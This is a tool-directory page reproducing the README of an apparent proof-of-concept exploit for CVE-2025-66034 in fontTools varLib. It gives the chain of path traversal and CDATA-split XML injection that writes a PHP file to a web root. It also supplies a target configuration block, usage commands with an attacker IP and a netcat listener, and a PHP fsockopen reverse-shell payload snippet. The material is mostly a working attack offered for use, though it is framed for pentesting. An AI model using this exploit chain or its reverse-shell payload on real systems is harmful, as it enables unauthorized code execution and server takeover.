Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
POC-CVE-2025-66034 — Automated exploit for CVE-2025-66034, chaining path traversal and XML injection in fontTools varLib to achieve unauthenticated remote code execution via crafted .designspace file upload. | Kitploit
Tools/GitHubGitHub/v3cn4x00/poc-cve-2025-66034
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationBinary AnalysisLearning & EducationRemote Access Tool
GitHubv3cn4x00/poc-cve-2025-66034

POC-CVE-2025-66034

Automated exploit for CVE-2025-66034, chaining path traversal and XML injection in fontTools varLib to achieve unauthenticated remote code execution via crafted .designspace file upload.

466 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
Share

font_varlib.py — CVE-2025-66034

fontTools varLib — Arbitrary File Write + XML Injection → Remote Code Execution

CVE Component Class Language Deps License


Table of Contents

  • Overview
  • Vulnerability Details
  • Attack Chain
  • Requirements
  • Installation
  • Configuration
  • Usage
  • How It Works
  • Vulnerable Code
  • Pre-Exploitation Checklist
  • Tested On
  • Disclaimer
  • References

Overview

CVE-2025-66034 is a vulnerability in the fontTools.varLib variable font generation pipeline. When a web application exposes this pipeline and accepts user-supplied .designspace files, two weaknesses chain together to achieve unauthenticated remote code execution.

font_varlib.py automates the full exploit chain — font generation, payload crafting, upload, and reverse shell delivery.


Vulnerability Details

FieldDetail
CVE IDCVE-2025-66034
GHSAGHSA-768j-98cg-p3fv
Packagefonttools (pip)
Affected Range>= 4.33.0, < 4.60.2
Fixed In4.60.2
SeverityModerate (CVSS 6.3)
Attack VectorLocal (requires file upload to target)
Privileges RequiredNone
User InteractionRequired (upload trigger)

Weakness Chain

#PrimitiveCWERoot Cause
1Path TraversalCWE-22filename attribute in .designspace passed directly to os.path.join() without sanitization — absolute paths discard the intended output directory entirely
2XML InjectionCWE-91<labelname> CDATA sections allow a split sequence (]]]]><![CDATA[>) to smuggle raw PHP past the XML parser into the written output file

Attack Chain

Attacker crafts malicious .designspace
            │
            ├── <variable-font filename="/var/www/html/files/shell.php">
            │        └── PATH TRAVERSAL
            │            os.path.join(output_dir, absolute_path)
            │            → output_dir discarded → write to web root
            │
            └── <labelname><![CDATA[<?php ... ?>]]]]><![CDATA[>]]></labelname>
                     └── XML INJECTION
                         CDATA split embeds raw PHP
                         into the output font binary
            │
            ▼
    fontTools.varLib.main() processes file server-side
            │
            ▼
    shell.php written to web-accessible directory
            │
            ▼
    GET /files/shell.php → PHP executes → reverse shell callback
            │
            ▼
    RCE as www-data

Requirements

Python: 3.9+

Dependencies:

pip install fonttools requests

System:

nc (netcat) — required for auto listener mode (--no-listen skips this)

Installation

git clone https://github.com/yourhandle/font_varlib
cd font_varlib
pip install fonttools requests

Configuration

Before running, open font_varlib.py and update the config block at the top of the file to match your target. Every value has an inline comment explaining what it is and how to find the correct value.

# ══════════════════════════════════════════════════════════════════════════════
#  DEFAULTS
#  Change these to match your target before running.
#  All values can also be overridden at runtime via CLI flags — see --help.
# ══════════════════════════════════════════════════════════════════════════════

# Base URL of the upload host (the site that accepts the .designspace)
UPLOAD_HOST      = "http://test.com"

# Path on the upload host that processes the multipart form POST
# Confirm with Burp — look for the POST after clicking the generate button
UPLOAD_ENDPOINT  = "/tools/variable-font-generator/process"

# Absolute filesystem path on the server where output files are written
# Must be web-accessible so the shell can be triggered via HTTP
WEBROOT          = "/var/www/test.com/public/files"

# Base URL used to fetch/trigger the written shell file
# Maps to WEBROOT on disk
SHELL_HOST       = "http://testing.test.com/files"

# Multipart form field names — confirm with Burp before running
# If upload silently fails (HTTP 200 but no shell), wrong field names are the cause
FIELD_DESIGNSPACE = "designspace"
FIELD_MASTERS     = "masters"

# Shell filename prefix — random suffix appended at runtime
SHELL_PREFIX     = "f0nt_"

# Length of random suffix — longer = harder to guess
SHELL_SUFFIX_LEN = 8

Tip: Intercept a legitimate upload request in Burp Suite to confirm UPLOAD_ENDPOINT and the exact multipart field names before running. A mismatch in field names causes a silent failure — the server returns HTTP 200 but no shell is written.


Usage

Basic — auto nc listener

python3 font_varlib.py --ip <ATTACKER_IP> --port <PORT>

Manual listener — start nc yourself

# Terminal 1 — start your listener
nc -lvnp 4444

# Terminal 2 — run exploit without auto listener
python3 font_varlib.py --ip <ATTACKER_IP> --port 4444 --no-listen

Custom target — override all defaults at runtime

python3 font_varlib.py \
  --ip 10.10.14.5 \
  --port 4444 \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/html/files \
  --shell http://target.htb/files

Full options reference

ArgumentRequiredDefaultDescription
--ip✓—Attacker listener IP
--port✓—Attacker listener port
--uploadUPLOAD_HOST + UPLOAD_ENDPOINTUpload endpoint (POST)
--webrootWEBROOTServer-side filesystem write path (must be web-accessible)
--shellSHELL_HOSTBase URL used to trigger the written shell
--no-listenfalseSkip auto nc listener — trigger only

How It Works

Step 1 — Font Generation

Two minimal but structurally valid .ttf source files are generated programmatically using fontTools.FontBuilder. varLib requires at least two axis masters to process a variable font — these satisfy that requirement without needing real font files on disk.

Step 2 — Payload Crafting

A malicious .designspace XML file is constructed embedding both attack primitives:

Primitive 1 — XML Injection via CDATA split:

<labelname xml:lang="en">
  <![CDATA[<?php $s=fsockopen("IP",PORT); ... ?>]]]]><![CDATA[>]]>
</labelname>

The sequence ]]]]><![CDATA[> terminates the current CDATA block and immediately opens a new one. The XML parser processes this as valid markup, but varLib serializes the content verbatim into the output file — embedding raw PHP into the font binary.

Primitive 2 — Path Traversal via filename attribute:

<variable-font name="MaliciousFont" filename="/var/www/html/files/shell.php">

varLib constructs the output path as:

output_path = os.path.join(output_dir, filename)

When filename is an absolute path, Python's os.path.join() discards output_dir entirely. No sanitization is applied in affected versions.

Step 3 — Upload

The .designspace and both .ttf files are sent as a multipart POST to the target's font generation endpoint using field names confirmed from Burp.

Step 4 — Trigger

Download Tool